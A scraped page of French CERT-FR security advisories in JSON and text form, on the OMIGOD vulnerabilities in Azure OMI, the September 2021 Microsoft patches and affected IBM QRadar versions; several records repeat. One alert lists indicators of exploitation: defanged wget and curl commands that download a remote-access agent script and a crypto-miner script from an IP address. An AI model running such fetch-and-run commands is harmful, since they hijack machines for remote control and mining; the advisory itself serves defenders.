  "content": "## Solution\n\nLe CERT-FR recommande fortement la mise \u00e0 jour des extensions\nvuln\u00e9rables. Pour cela, dans le cadre d\u0027un d\u00e9ploiement dans le *Cloud*,\nveuillez vous assurer que la mise \u00e0 jour a bien \u00e9t\u00e9 appliqu\u00e9e, sinon\ndans le cas contraire l\u0027effectuer manuellement. En ce qui concerne les\nd\u00e9ploiements *OnPremises,* les mises \u00e0 jour des extensions vuln\u00e9rables\n\u003cu\u003edoivent \u00eatre r\u00e9alis\u00e9es manuellement\u003c/u\u003e. Afin d\u0027identifier les\nextensions concern\u00e9es par ces vuln\u00e9rabilit\u00e9s, les utilisateurs peuvent\nutiliser Azure Portal ou Azure CLI comme d\u00e9crit dans la documentation de\nMicrosoft \\[3\\].\n\n**Le CERT-FR rappelle \u00e9galement que ce type de service ne doit pas \u00eatre\nexpos\u00e9 sur Internet. De plus, il est fortement recommand\u00e9 de filtrer\nl\u2019acc\u00e8s des ports susmentionn\u00e9s associ\u00e9s au service OMI uniquement aux\nmachines d\u0027administration autoris\u00e9es.** \n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    }
  ],
  "links": [
    {
      "title": "[4] Aide pour l\u0027utilisation de Azure Sentinel",
      "url": "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"
    },
    {
      "title": "[1] Publication de l\u0027\u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s de Wiz",
      "url": "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure"
    },
    {
      "title": "[5] Avis CERT-FR du 15 septembre 2021",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2021-AVI-711/"
    },
    {
      "title": "[3] Documentation de Microsoft",
      "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/features-linux#discover-vm-extensions"
    },
    {
      "title": "[2] Recommandations suppl\u00e9mentaires pour les vuln\u00e9rabilit\u00e9s OMIGOD",
      "url": "https://msrc-blog.microsoft.com/2021/09/16/additional-guidance-regarding-omi-vulnerabilities-within-azure-vm-management-extensions/"
    }
  ],
  "reference": "CERTFR-2021-ALE-020",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-17T00:00:00.000000"
    },
    {
      "description": "Ajout de la r\u00e9f\u00e9rence \u00e0 l\u0027avis CERT-FR",
      "revision_date": "2021-09-22T00:00:00.000000"
    },
    {
      "description": "Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
      "revision_date": "2022-01-05T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "\u003cstrong\u003e\\[Version du 20 septembre 2021\\]\u003c/strong\u003e\n\n\u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\nclass=\"mx_EventTile_body\" dir=\"auto\"\u003eLe 18 septembre Microsoft a publi\u00e9\nun article afin d\u0027expliquer comment Azure Sentinel peut aider \u00e0 la\nrecherche d\u0027une compromission notamment l\u0027exploitation des\nvuln\u00e9rabilit\u00e9s OMIGOD \\[4\\]. De plus, \u00e0 cette occasion, les marqueurs\nsuivants, qui correspondent \u00e0 des traces li\u00e9es \u00e0 une tentative\nd\u0027exploitation, ont \u00e9t\u00e9 propos\u00e9s par Microsoft : \u003c/span\u003e\u003c/span\u003e\n\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ewget\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    -O dwagent_generic.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003eecho curl\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    --output dw.sh \\\u003e go.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ecurl -fSsL\n    http://104\\[.\\]168\\[.\\]213\\[.\\]31:55879/coinlinux/runMiner\\[.\\]sh\u003c/span\u003e\u003c/span\u003e\n\n\u003cstrong\u003e\\[Version initiale\\]\u003c/strong\u003e\n\nLe 14 septembre 2021, une \u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s a\nd\u00e9couvert quatre vuln\u00e9rabilit\u00e9s dans Microsoft Azure, la plateforme\ncloud de Microsoft \\[1\\]. Ces vuln\u00e9rabilit\u00e9s sont situ\u00e9es au sein du\nservice OMI, lequel est d\u00e9ploy\u00e9 dans l\u0027\u00e9cosyst\u00e8me Azure. Ces\nvuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 regroup\u00e9es sous l\u2019appellation de \u00ab *OMIGOD* \u00bb. Le\nservice OMI est le pendant open-source pour la famille de syst\u00e8mes\nd\u0027exploitation de type Linux ou Unix de WMI (Windows Management\nInfrastructure) et permet la gestion des configurations dans des\nenvironnements distants et locaux.\n\n\u00a0\n\nEn particulier, la vuln\u00e9rabilit\u00e9 immatricul\u00e9e CVE-2021-38647 permet \u00e0 un\nattaquant non authentifi\u00e9 de r\u00e9aliser une ex\u00e9cution de code arbitraire\navec les privil\u00e8ges de l\u0027utilisateur *root*. Elle impacte uniquement les\nentit\u00e9s utilisant les solutions de gestion Linux (*On-Premises* SCOM,\nAzure Automation State Configuration ou Azure Desired State\nConfiguration extension) lorsque la gestion \u00e0 distance est activ\u00e9e.\n\n\u00a0\n\nPour des besoins de gestion \u00e0 distance, il est possible que les ports\nassoci\u00e9s \u00e0 OMI (5986 / 5985 / 1270) soient accessibles depuis Internet.\nDans ce cas, la vuln\u00e9rabilit\u00e9 peut \u00eatre exploit\u00e9e afin d\u0027obtenir un\nacc\u00e8s initial \u00e0 un environnement Azure pour ensuite pouvoir se d\u00e9placer\nlat\u00e9ralement au sein du syst\u00e8me d\u0027information, en tirant notamment parti\ndes trois autres vuln\u00e9rabilit\u00e9s, qui permettent une \u00e9l\u00e9vation de\nprivil\u00e8ges locale.\n\n\u00a0\n\nDans le cadre de son Patch Tuesday, en date du 14 septembre 2021 \\[5\\],\nMicrosoft a ainsi mis \u00e0 disposition un correctif pour ces quatre\nvuln\u00e9rabilit\u00e9s :\n\n-   CVE-2021-38647 : Avec un score CVSSv3 \u00e0 9.8 et permettant \u00e0 un\n    attaquant de pouvoir ex\u00e9cuter du code arbitraire \u00e0 distance ;\n-   CVE-2021-38648 : Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38645 :\u00a0Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38649 :\u00a0Avec un score CVSSv3 \u00e0 7.0 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u00a0\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003cstrong\u003eDes codes d\u0027exploitation sont publiquement disponibles sur Internet\npour la CVE-2021-38647\u003c/strong\u003e, ce qui signifie que l\u2019exploitation de cette\nvuln\u00e9rabilit\u00e9 est imminente ou d\u00e9j\u00e0 en cours.\n\n\u003c/div\u003e\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003c/div\u003e\n\n\u003c/div\u003e\n",
  "title": "[Maj] Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Open Management Infrastructure",
  "vendor_advisories": [
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38648",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38649",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38645",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38647",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647"
    }
  ]
}

CERTFR-2021-AVI-711

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités ont été corrigées dans les produits Microsoft. Elles permettent à un attaquant de provoquer une exécution de code à distance, une atteinte à la confidentialité des données, une élévation de privilèges et une usurpation d'identité.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Microsoft	N/A	Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2020 Release Wave 2 – Update 17.10
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.7 (includes 16.0 – 16.6)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)
Microsoft	N/A	HEVC Video Extensions
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)
Microsoft	N/A	Visual Studio Code
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour systèmes 32 bits
Microsoft	N/A	MPEG-2 Video Extension
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour 64 bits Systems
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5
Microsoft	Azure	Azure Sphere
Microsoft	Azure	Azure Open Management Infrastructure

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft du 14 septembre 2021

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2020 Release Wave 2 \u2013 Update 17.10",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "HEVC Video Extensions",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Visual Studio Code",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour syst\u00e8mes 32 bits",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "MPEG-2 Video Extension",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour 64 bits Systems",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Sphere",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Open Management Infrastructure",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38655",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38655"
    },
    {
      "name": "CVE-2021-38644",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38644"
    },
    {
      "name": "CVE-2021-38653",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38653"
    },
    {
      "name": "CVE-2021-38654",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38654"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38661",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38661"
    },
    {
      "name": "CVE-2021-38650",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38650"
    },
    {
      "name": "CVE-2021-38646",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38646"
    },
    {
      "name": "CVE-2021-36956",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36956"
    },
    {
      "name": "CVE-2021-38657",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38657"
    },
    {
      "name": "CVE-2021-36952",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36952"
    },
    {
      "name": "CVE-2021-38659",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38659"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    },
    {
      "name": "CVE-2021-26434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26434"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38656",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38656"
    },
    {
      "name": "CVE-2021-26437",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26437"
    },
    {
      "name": "CVE-2021-40440",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-40440"
    }
  ],
  "links": [],
  "reference": "CERTFR-2021-AVI-711",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-16T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Usurpation d\u0027identit\u00e9"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 corrig\u00e9es dans \u003cspan\nclass=\"textit\"\u003eles produits Microsoft\u003c/span\u003e. Elles permettent \u00e0 un\nattaquant de provoquer une ex\u00e9cution de code \u00e0 distance, une atteinte \u00e0\nla confidentialit\u00e9 des donn\u00e9es, une \u00e9l\u00e9vation de privil\u00e8ges et une\nusurpation d\u0027identit\u00e9.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft du 14 septembre 2021",
      "url": "https://msrc.microsoft.com/update-guide/"
    }
  ]
}

CERTFR-2021-AVI-723

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été découverte dans IBM QRadar Azure. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	IBM	QRadar	IBM QRadar versions 7.3.0 à 7.3.3 Patch 9
	IBM	QRadar	IBM QRadar versions 7.4.0 à 7.4.3 Patch 2

References

Title

Publication Time

Tags

Bulletin de sécurité IBM 6491159 du 20 septembre 2021

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "IBM QRadar versions 7.3.0 \u00e0 7.3.3 Patch 9",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "IBM QRadar versions 7.4.0 \u00e0 7.4.3 Patch 2",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    }
  ],
  "links": [],
  "reference": "CERTFR-2021-AVI-723",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-22T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans IBM QRadar Azure. Elle permet \u00e0\nun attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans IBM QRadar Azure",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 20 septembre 2021",
      "url": "https://www.ibm.com/support/pages/node/6491159"
    }
  ]
}

CERTFR-2021-AVI-745

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été découverte dans IBM Qradar. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

L'éditeur indique que le port lié au service OMI n'est pas exposé mais recommande fortement d'appliquer les correctifs.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	IBM	QRadar	IBM QRadar pour Azure versions 7.3.3 Patch 9 et antérieures
	IBM	QRadar	IBM QRadar pour Azure versions 7.4.3 Patch 2 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité IBM 6491159 du 30 septembre 2021	None	vendor-advisory
Bulletin de sécurité IBM 6491159 du 30 septembre 2021	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "IBM QRadar pour Azure versions 7.3.3 Patch 9 et ant\u00e9rieures",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "IBM QRadar pour Azure versions 7.4.3 Patch 2 et ant\u00e9rieures",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 30 septembre 2021",
      "url": "https://www.ibm.com/support/pages/node/6491159"
    }
  ],
  "reference": "CERTFR-2021-AVI-745",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-10-01T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans IBM Qradar. Elle permet \u00e0 un\nattaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n\nL\u0027\u00e9diteur indique que le port li\u00e9 au service OMI n\u0027est pas expos\u00e9 mais\nrecommande fortement d\u0027appliquer les correctifs.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans IBM  Qradar",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 30 septembre 2021",
      "url": null
    }
  ]
}

CERTFR-2021-AVI-711

Vulnerability from certfr_avis - Published: - Updated:

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Microsoft	N/A	Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2020 Release Wave 2 – Update 17.10
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.7 (includes 16.0 – 16.6)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)
Microsoft	N/A	HEVC Video Extensions
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)
Microsoft	N/A	Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)
Microsoft	N/A	Visual Studio Code
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour systèmes 32 bits
Microsoft	N/A	MPEG-2 Video Extension
Microsoft	N/A	Microsoft 365 Apps pour Enterprise pour 64 bits Systems
Microsoft	N/A	Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5
Microsoft	Azure	Azure Sphere
Microsoft	Azure	Azure Open Management Infrastructure

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft du 14 septembre 2021

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2020 Release Wave 2 \u2013 Update 17.10",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "HEVC Video Extensions",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Visual Studio 2019 version 16.11 (includes 16.0 - 16.10)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Visual Studio Code",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour syst\u00e8mes 32 bits",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "MPEG-2 Video Extension",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft 365 Apps pour Enterprise pour 64 bits Systems",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Microsoft Dynamics 365 Business Central 2021 Release Wave 1 - Update 18.5",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Sphere",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Open Management Infrastructure",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38655",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38655"
    },
    {
      "name": "CVE-2021-38644",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38644"
    },
    {
      "name": "CVE-2021-38653",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38653"
    },
    {
      "name": "CVE-2021-38654",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38654"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38661",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38661"
    },
    {
      "name": "CVE-2021-38650",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38650"
    },
    {
      "name": "CVE-2021-38646",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38646"
    },
    {
      "name": "CVE-2021-36956",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36956"
    },
    {
      "name": "CVE-2021-38657",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38657"
    },
    {
      "name": "CVE-2021-36952",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-36952"
    },
    {
      "name": "CVE-2021-38659",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38659"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    },
    {
      "name": "CVE-2021-26434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26434"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38656",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38656"
    },
    {
      "name": "CVE-2021-26437",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26437"
    },
    {
      "name": "CVE-2021-40440",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-40440"
    }
  ],
  "links": [],
  "reference": "CERTFR-2021-AVI-711",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-16T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Usurpation d\u0027identit\u00e9"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 corrig\u00e9es dans \u003cspan\nclass=\"textit\"\u003eles produits Microsoft\u003c/span\u003e. Elles permettent \u00e0 un\nattaquant de provoquer une ex\u00e9cution de code \u00e0 distance, une atteinte \u00e0\nla confidentialit\u00e9 des donn\u00e9es, une \u00e9l\u00e9vation de privil\u00e8ges et une\nusurpation d\u0027identit\u00e9.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft du 14 septembre 2021",
      "url": "https://msrc.microsoft.com/update-guide/"
    }
  ]
}

CERTFR-2021-AVI-723

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été découverte dans IBM QRadar Azure. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	IBM	QRadar	IBM QRadar versions 7.3.0 à 7.3.3 Patch 9
	IBM	QRadar	IBM QRadar versions 7.4.0 à 7.4.3 Patch 2

References

Title

Publication Time

Tags

Bulletin de sécurité IBM 6491159 du 20 septembre 2021

